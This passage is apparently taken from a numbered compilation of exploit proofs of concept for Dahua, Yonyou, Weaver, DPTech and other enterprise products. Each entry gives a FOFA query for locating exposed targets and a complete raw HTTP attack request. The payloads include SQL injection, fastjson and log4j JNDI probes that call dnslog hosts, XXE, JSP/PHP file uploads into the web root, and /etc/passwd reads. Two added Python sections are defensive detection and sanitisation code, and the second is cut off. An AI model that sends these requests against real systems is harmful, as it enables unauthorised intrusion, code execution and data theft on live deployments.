User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. Dahua ICC smart IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC smart IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
The body is intentionally malformed JSON (the trailing "" after the inner object is part of the published fastjson autotype probe, not a typo); a DNS lookup from the target for the dnslog hostname confirms the sink.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. Dahua ICC smart IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. Dahua ICC smart IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
Same endpoint and probe as item 21, with the dnslog hostname left as a placeholder.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}
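The following is an added example, not part of the original compilation or of Dahua's code, covering items 21 to 23. Two points matter when writing detection for these bodies. First, the fastjson probe is deliberately malformed JSON, so a rule that only inspects bodies `json.loads()` accepts never sees it: scan the raw text for `"@type"`. Second, log4j resolves nested lookups before it evaluates the `jndi:` prefix, so `${${lower:j}ndi:...}` has to be collapsed before matching; the statically resolvable lookups (`lower:`, `upper:`, and the `:-` default-value form) are handled below and anything else is reported as unresolved. The class watchlist and the obfuscated variants are illustrative, not exhaustive.

```python
"""Inspecting JSON request bodies for fastjson autotype and log4j JNDI lookups (added example)."""
import json
import re

# Bodies from items 21-23 of the list, whitespace removed, hostnames as published.
FASTJSON_PROBE = ('{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
                  '{"@type":"java.net.URL","val":"http://DNSLOG"}}""}')
LOG4J_PROBE = '{"loginName":"${jndi:ldap://dnslog}"}'

AUTOTYPE_RE = re.compile(r'"@type"\s*:\s*"([A-Za-z_$][\w$.]*)"')
# Classes a client should never be allowed to name in @type (illustrative list).
AUTOTYPE_WATCHLIST = {
    "com.alibaba.fastjson.JSONObject",
    "java.net.URL",
    "java.net.InetAddress",
    "com.sun.rowset.JdbcRowSetImpl",
}

INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")  # a ${...} with no ${ inside it
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
RESIDUAL_RE = re.compile(r"\$\{\s*(sys|env|java|ctx|date|main|bundle)\s*:", re.IGNORECASE)


def _resolve_lookup(body: str):
    """Resolve the lookups that need no runtime state; None when we cannot."""
    if ":-" in body:                      # ${anything:-default} evaluates to default
        return body.split(":-", 1)[1]
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    return None


def normalise_lookups(text: str, max_passes: int = 10) -> str:
    """Collapse innermost resolvable lookups repeatedly, innermost first, as log4j would."""
    for _ in range(max_passes):
        changed = False

        def replace(m):
            nonlocal changed
            resolved = _resolve_lookup(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNERMOST_LOOKUP.sub(replace, text)
        if not changed:
            break
    return text


def is_well_formed_json(body: str) -> bool:
    try:
        json.loads(body)
        return True
    except json.JSONDecodeError:
        return False


def inspect_body(body: str) -> list:
    """Return human-readable findings for one request body, in order of appearance."""
    findings = []
    for cls in AUTOTYPE_RE.findall(body):
        if cls in AUTOTYPE_WATCHLIST:
            findings.append(f"fastjson autotype: {cls}")
    normalised = normalise_lookups(body)
    if JNDI_RE.search(normalised):
        findings.append("log4j jndi lookup")
    elif RESIDUAL_RE.search(normalised):
        findings.append("unresolved log4j lookup")
    return findings


if __name__ == "__main__":
    print(is_well_formed_json(FASTJSON_PROBE), inspect_body(FASTJSON_PROBE))
    print(is_well_formed_json(LOG4J_PROBE), inspect_body(LOG4J_PROBE))
    print(inspect_body('{"loginName":"${${lower:j}${upper:n}di:${::-l}dap://dnslog}"}'))
```

`is_well_formed_json(FASTJSON_PROBE)` is False, which is exactly why a parse-then-inspect rule misses it, while `inspect_body` still names both classes. On the application side the equivalent fixes are disabling fastjson autotype (or an allow-list of classes) and upgrading log4j so lookups are not evaluated in message text; the inspection here is for finding attempts in traffic and logs, not a substitute for those.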
5 e# T9 ~9 `# Y) A" ]( o3 T5 K- o1 r( q
. f8 r) I7 F: L$ j) O% P
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

The fname field supplies the destination path, so a .txt upload is written under the web root with a .jsp name.

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Time-based probe (MSSQL waitfor delay): compare the response time with that of a benign pkBill value; a consistent delay of about 5 seconds confirms the injection.

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

Oracle variant of the same time-based check: DBMS_PIPE.RECEIVE_MESSAGE(1,5) blocks for 5 seconds.

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Then request:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

The injection point is the billitem query parameter; the multipart body only has to be present for the handler to run.

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

The accessToken is an HS512 JWT whose payload claims userCode admin; whether it is accepted depends on the target's signing key. The filename carries the traversal into the web root, and the uploaded 1.jsp prints 1234321 when requested.

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

The entity reference is URL-encoded (%26xxe1two%3b is &xxe1two;) so that it survives form decoding and is expanded by the XML parser inside the faultcode element.

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

Blind (out-of-band) XXE: the XML carried inside the CDATA string is parsed again by the service, and the parameter entity fetches its DTD from the DNSLOG host; a DNS hit confirms the issue.

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

Error-based probe: comparing the hex string against 0 forces a SQL Server conversion error whose message echoes the MD5 of 123456 (e10adc3949ba59abbe56e057f20f883e).

40. Yonyou U8 Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Then request:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

The injection point is the userId element of the SOAP call; the stacked waitfor delay statement is the time-based confirmation.

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

Note the DontCheckLogin=1 query parameter: the request is sent without any session.

49. Yonyou U8 CRM uploadfile.php arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The filename ends in a trailing space, a common trick against naive extension checks. Then request:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

MySQL error-based probe: the XPATH syntax error echoes the MD5 of 123456 between ^ markers (extractvalue truncates the echoed value to 32 characters).

51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

The tfs value closes the backtick-quoted table name and appends a union; the md5(102103122) value appearing in the response confirms the injection.

53. DPTech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

The only POC given is a URL-encoded path-traversal read of /etc/passwd, so for risk checks treat this entry as an arbitrary file read.

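Added example, not from the original list or from any of the vendors above: the server-side checks whose absence the upload POCs (entries 24, 28, 35, 48 and 49) and the file-read POCs (entries 47 and 53) exploit. clean_upload_name() rejects path components smuggled in through fname or filename, executable extensions and the trailing-space trick; resolve_download() confines a requested file name under a web-root directory after decoding ..%2F traversal. The function names, the extension list and the /srv/app/files root directory are assumptions for the example.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Extensions the application server would execute if the file landed under the
# web root (assumed list; extend it for the stack actually deployed).
EXECUTABLE_EXTS = {"jsp", "jspx", "php", "phtml", "php5", "asp", "aspx", "ashx"}
# One stem plus one optional extension, nothing else; keeps "%s.php" and "a.b.c" out.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,120}(?:\.[A-Za-z0-9]{1,10})?")


def clean_upload_name(raw: str) -> Optional[str]:
    """Return a safe basename for an uploaded file, or None if it must be rejected.

    Rejects any directory component (so fname=\\webapps\\nc_web\\x.jsp and
    filename="./webapps/nc_web/1.jsp" cannot choose where the file lands),
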